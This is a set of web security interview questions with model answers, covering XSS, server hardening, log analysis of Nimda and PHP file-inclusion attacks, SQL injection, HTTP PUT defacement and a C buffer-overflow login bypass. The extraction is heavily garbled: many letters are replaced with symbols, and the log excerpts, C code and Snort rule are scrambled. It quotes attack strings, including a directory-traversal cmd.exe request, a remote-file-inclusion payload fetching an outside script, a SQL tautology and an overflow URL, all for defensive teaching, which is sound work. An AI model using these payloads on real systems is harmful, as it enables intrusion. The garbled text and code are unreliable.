Web Security Interview Questions

The goal of this document is to provide appropriate questions for

HR/anagers to pose to individuals who are applying for web security
related positions! These questions do not have right or wrong
answers" but rather spar# relevant conversation between the applicant
and the hiring staff!
Entry Level Questions
1. What do you see as the most critical and current threats effecting
Internet accessible websites?
$oal of question % To gauge the applicant&s #nowledge of current web
related threats! Topics such as 'enial of Service" (rute )orce" (uffer
*verflows" and Input +alidation are all relevant topics! Hopefully they
will mention information provided by web security organi,ations such
as the Web -pplication Security .onsortium /W-S.0 or the *pen Web
-pplication Security 1ro2ect /*W-S10!
2. What online resources do you use to keep abreast of web security
issues? Can you give an example of a recent web security
vulnerability or threat?
$oal of question % 'etermine if the applicant utili,es computer security
resources such as .3RT" S-4S Internet Storm .enter or I.-T! 3mail
lists such as securityfocus" bugtraq" S-4S 5RIS6" etc! are also good
resources! Recent e7amples of threats will vary depending on current
events" but issues such as new web based worms /1H1 Santy Worm0
or applications" which are in wide use /awstats scripts0 are acceptable!
8! What do you see as challenges to successfully deploying/monitoring
web intrusion detection9
$oal of question % We are attempting to see if the applicant has a wide
#nowledge of web security monitoring and I'S issues such as:
imitations of !I"# for web monitoring $##% semantic issues
with understanding &''()
(roper logging * increasing the verboseness of logging
$+od,#ecurity audit,log)
-emote Centrali.ed ogging
/lerting +echanisms
0pdating #ignatures1(olicies
;! What is your definition of the term <.ross=Site Scripting>9 What is
the potential impact to servers and clients9
2oal of 3uestion *'his 3uestion will determine if the applicant is well
versed in the terminology used in web security. 'he applicant needs
to be able to articulate highly technological topics to a wide audience.
'he second 3uestion will help to verify that the applicant fully
understands how 4## attacks work and the impact to client
information. W/#C has a web security glossary of terms that may be
of help 5 http611www.webappsec.org1glossary.html
Cross-Site Scripting: (Acronym XSS) An attack technique that forces a web
site to echo client-supplied data, which execute in a users web browser! "hen a
user is #ross-Site Scripted, the attacker will ha$e access to all web browser
content (cookies, history, application $ersion, etc)! XSS attacks do not typically
directly tar%et the web ser$er or application, but are rather aimed at the client!
&he web ser$er is merely used as a conduit for the XSS data to be presented to
the end client! See also '#lient-Side Scriptin%(!

?! What are the most important steps you would recommend for
securing a new web server9 Web application9
2oal of 3uestion * 7nce again% there is no right or wrong answer%
however we are interested in what the applicant views as important.
Web #erver #ecurity6
0pdate1(atch the web server software
+inimi.e the server functionality * disable extra modules
"elete default data1scripts
Increase logging verboseness
0pdate (ermissions17wnership of files
Web /pplication #ecurity6
+ake sure Input 8alidation is enforced within the code 5
#ecurity 9/ testing
Configured to display generic error messages
Implement a software security policy
-emove or protect hidden files and directories
Advanced Level Questions
1. Imagine that we are running an /pache reverse proxy server and
one of the servers we are proxy for is a Windows II# server. What
does the log entry suggest has happened? What would you do in
response to this entry?
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/syste!2/
c".e#e$/c%"ir &TT'/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:2!:48 -0500] "GET /c/winnt/syste!2/
c".e#e$/c%t(t)*20-*2068.48.142.117*20GET*20c++,.",,*20c:--.tt)+"/c.",, &TT'/1.0" 200
566 "-" "-"
$oal of question % To see if the applicant is fluent at reading web
server log files in the .ommon @og )ormat /.@)0! In this scenario" the
client system /AB!;B!C;D!CCE0 is infected with the 4imda worm!
These requests will not affect our -pache pro7y server since this is a
icrosoft vulnerability! While it does not impact -pache" the logs do
indicate that the initial request was successful /status code of DFF0!
The 4imda worm will only send the level D request /trying to use
Trivial )T1 to infect the target0 if the initial request is successful!
'epending on the e7act pro7ying rules in place" it would be a good
idea to inspect the internal IIS server to verify that it has not been
compromised!
If you were not using /pache as the reverse proxy% what +icrosoft
application1tool could you use to mitigate this attack?
Gou could use either icrosoftHs Internet and Security -cceleration
/IS-0 server as a front=end pro7y or implement IR@Scan on the target
IIS server! The urlscan!ini file has the -llow'otIn1ath directive which
will bloc# directory traversal attempts!
2. :ou are engaged in a penetration5test where you are attempting to
gain access to a protected location. :ou are presented with this
login screen6
What are some examples of you how you would attempt to gain
access?
$oal of question % 'etermine if the applicant has a wide #nowledge of
different authentication vulnerabilities! They may attempt default
usernames/passwords or attempt SQ@ In2ection queries that provide
an SQ@ true statement /such as % J *R CKCL0! If they provide SQ@
e7amples" then offer them the following 3rror document information
and as# them what this indicates!
0123 Err+r 3+"e 4 !7000 56ynta# err+r +r access 7i+,ati+n8
[Micr+s+(t][0123 69: 6er7er 1ri7er][69: 6er7er]:ine 4: ;nc+rrect synta# near <4<.
1ata 6+=rce 4 "E3+erceT.e>rc.6=))+rt2"
S)* + ,S-*-#& )uick.ump/0tems!0tem0d 1234 )uick.ump/0tems "5-2-
)uick.ump/0tems!0tem0d 67 8 A9: )uick.ump0d +,
T.e err+r +cc=rre" w.i,e )r+cessin? an e,eent wit. a ?enera, i"enti(ier +( 53@9AEBC8D
+cc=)yin? "+c=ent )+siti+n 51:18 t+ 51:428 in t.e te),ate (i,e
E:-;net'=/-c,ients-,+?in-.tt)-ai,ent.c(
T.e s)eci(ic seF=ence +( (i,es inc,="e" +r )r+cesse" is:
E:-;GET'A2-3:;EGT6-:0G;G-&TT'->;:MEGT.3@M
This error message indicates that the target web application if running
icrosoft SQ@ and discloses directory structures!
;. What application generated the log file entry below? What type of
attack is this? /ssuming the index.php program is vulnerable% was
this attack successful?
4444444444444444444444444444444444444444
BeF=est: 200.158.8.207 - - [09/0ct/2004:19:40:46 --0400] "'06T /in"e#.).) &TT'/1.1" 40! 74!
&an",er: c?i-scri)t
----------------------------------------
'06T /in"e#.).) &TT'/1.1
&+st: www.(++.c+
3+nnecti+n: Hee)-a,i7e
>cce)t: I/I
>cce)t-:an?=a?e: en-=s
3+ntent-Enc+"in?: ?Ji)D "e(,ate
3+ntent-Ty)e: a)),icati+n/#-www-(+r-=r,enc+"e"
Aser->?ent: M+Ji,,a 4.0 5:in=#8
3+ntent-:en?t.: 65
K-@+rwar"e"-@+r: 200.158.8.207
+"Lsec=rity-essa?e: >ccess "enie" wit. c+"e 40!. 'attern atc. "=nae-#20-a" at
'06TL'>C:0>1
+"Lsec=rity-acti+n: 40!
65
,i"4.tt)://t.!.+wnJ.)5.+r?.=H/,i,a.M)?$Nc"4c" /t)Oi"O,s=nae -a
$oal of question % to verify that the applicant can interpret various
web log files" identify attac#s and possible impacts! The odMSecurity
-pache module generated this data in the auditMlog file! The log entry
indicates that an attac#er is attempting to e7ploit a 1H1 file inclusion
vulnerability in the inde7!php script! The commands being passed are
in the 1*ST 1-G@*-' of the command! This attac# was not successful
for the following two reasons:
The modMsecurity=message header indicates that odMSecurity
bloc#ed this request based on a converted Snort web=attac# rule
when it identified the <uname %a> data in the 1*ST 1-G@*-'!
The attac#er also made a typo in the *S commands being
passed in the 1*ST 1-G@*-'! She did not include a semicolon
<N> between the ls and uname commands! The target host
would fail to e7ecute the <lsuname> command!
<. 7ne of your web servers is logging multiple re3uests similar to the
following6
201.1.199.155 - - [26/1ec/2004:01:55:48 -0500] "'AT /.acHe"..t &TT'/1.0P 40! 769 QMicr+s+(t
1ata >ccess ;nternet '=/,is.in? 'r+7i"er 1>R 1.1P Q-Q
What does this log entry indicate? &ow could you identify what the
contents are of the =hacked.htm> file that the attacker is trying to
upload?
$oal of question % 'etermine if the applicant can identify both the
attac# /a web defacement attempt using the HTT1 1IT ethod0" as
well as" the logging limitations of .@)! In this type of attac#" the
defacement te7t is sent in the request body and not on the IR@
Request line! In order to identify this data" a networ# sniffing
application would need to be utili,ed! -n application such as Snort
could be used with a custom rule to identify this activity! Here is an
e7ample rule %
a,ert tc) SEKTEBG>:LGET any -T S&TT'L6EBREB6 S&TT'L'0BT6 5s?:":03>: '=t
atte)t"O (,+w:t+Lser7erDesta/,is.e"O ta?:sessi+nD50D)acHetsO )cre:"/U'AT />"O si":!000001O
re7:1O8
?. :ou have been asked to review the source code for a compiled
script that is being used to validate logon credentials for a web
application. 'he file is called =logon,validate> and a typical logon
re3uest looks like this *
QGET /c?i-/in/,+?+nL7a,i"ate$,+?in4testN)assw+r"4testP
The source code is shown below
void show_error(void) {
// AUTHENTICATION ERROR
exit(-1);
}
it !"i(it "r#$% $h"r &&"r#v) {
$h"r error_o_"'th()1);
$h"r 'ser*1+,-;
$h"r ."ss*1+,-;
$h"r &$h_.tr_/e#i;
$h"r &$h_.tr_ed;
/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
/& 0et User"!e 1ro! 2'er3 4tri# &/
/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
$h_.tr_/e#i(($h"r &)strstr(&&&&2UER5_4TRIN0&&&&%67o#i(6);
i1 ($h_.tr_/e#i((NU88)
show_error();
$h_.tr_/e#i9(:;
$h_.tr_ed(($h"r &)strstr($h_.tr_/e#i%6;6);
i1 ($h_.tr_ed((NU88)
show_error();
&($h_.tr_ed99)()<=);
str$.3('ser%$h_.tr_/e#i);
/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
/& 0et >"ssword 1ro! 2'er3 4tri# &/
/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
$h_.tr_/e#i(($h"r &)strstr($h_.tr_ed%6."ssword(6);
i1 ($h_.tr_/e#i((NU88)
show_error();
$h_.tr_/e#i9(?;
$h_.tr_ed(($h"r &)strstr($h_.tr_/e#i%6;6);
i1 ($h_.tr_ed@(NU88) &($h_.tr_ed99)()<=);
str$.3(."ss%$h_.tr_/e#i);
i1 ((str$!.('ser%0OOA_U4ER)((=) ;; (str$!.(."ss%0OOA_>A44)((=))
error_o_"'th()=);
i1 (error_o_"'th(()=)) {

// AUTHENTICATION OB@@
} e7se {
// AUTHENTICATION ERROR
show_error();
}
// ret'r(=); hehe $o'7d /e evi7 ;>>>>>
exit(=);
}
&his pseudo-code is taken from the 9;Sec "eb Auth ;ames
http<==qui>!n%sec!bi><?8?8=%ame@=le$elA=replicant!php
"o you see any problems with this script? &ow could an attacker
exploit this script to bypass the authentication mechanisms in this
script? What are some mitigation options?
$oal of question % This is most li#ely the most comple7 question being
as#ed during the interview due to the fact that the applicant will need
to apply multiple layers of analysis" including both the attac#er and
defender perspectives!
Reference <Smashing The Stac# )or )un -nd 1rofit> for technical
details %
http://www!phrac#!org/phrac#/;O/1;O=C;
The security issue with this script has to do with a buffer overflow
problem in the way that the script is using the <errorMonMauth>
condition! The errorMonMauth condition is initially declared to be <C>
which means that he user is not authenticated! The <user> condition
was declared directly after the errorMonMauth and has been allocated
CDB bytes! 'ue to the ordering of the declaration of the errorMonMauth
and user parameters" they occupy ad2acent locations on the running
stac#! The result is that if the attac#er submits a username that is
CDO bytes /with the last byte being <F>0" they can overwrite the
errorMonMauth data! - Ini7 command such as the following would
achieve this goal %
http<==www!companyx!com=c%i-bin=$alidate/lo%onBlo%on+888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888
8888888888888888888888888888
itigation options include the following:
Ipdate the validateMlogon soruce code to fi7 the problem" such
as using strncpy/0 instead of strcpy /0!
If the source code could not be updated" then security filters
would need to be implemented on the web server!
Ising odMSecurity" you could implement some security filters
for the <validateMlogon> IR@ such as these:
o *nly allow letters in the username argument! This would
prevent the client from overwriting the errorMonMauth data
with a ,ero!
V:+cati+n /c?i-/in/7a,i"ateL,+?+nT
6ec@i,ter6e,ecti7e >BGL:0G;G QWU[a-J>-X]P
V/:+cati+nT
o Gou could also add another rule to restrict the si,e of the
username/password arguments to be less then CDO
characters!
6*ocation =c%i-bin=$alidate/lo%on7
Sec1ilterSelecti$e A2;/*3;09 'CDEa->A-FG(
Sec1ilterSelecti$e A2;/*3;09HA2;/IASS"32: '!J@KL,M(
6=*ocation7
> we/ a)),icati+n (irewa,, 5Y>@8 "e7ice c+=," /e i),eente" +n t.e netw+rH t+
)r+tect t.e entire we/ site. T.ese "e7ices .a7e )+siti7e )+,icy ca)a/i,ity t.at
s.+=," i"enti(y t.ese ty)es +( attacHs as "an+a,+=s" an" "eny t.e. > /rie(
,istin? +( Y>@ 7en"+rs inc,="e Ter+sD Getc+nti==D ;)er7aD Yatc.(ireD 2reac.D
>#i,ianceD an" +t.ers.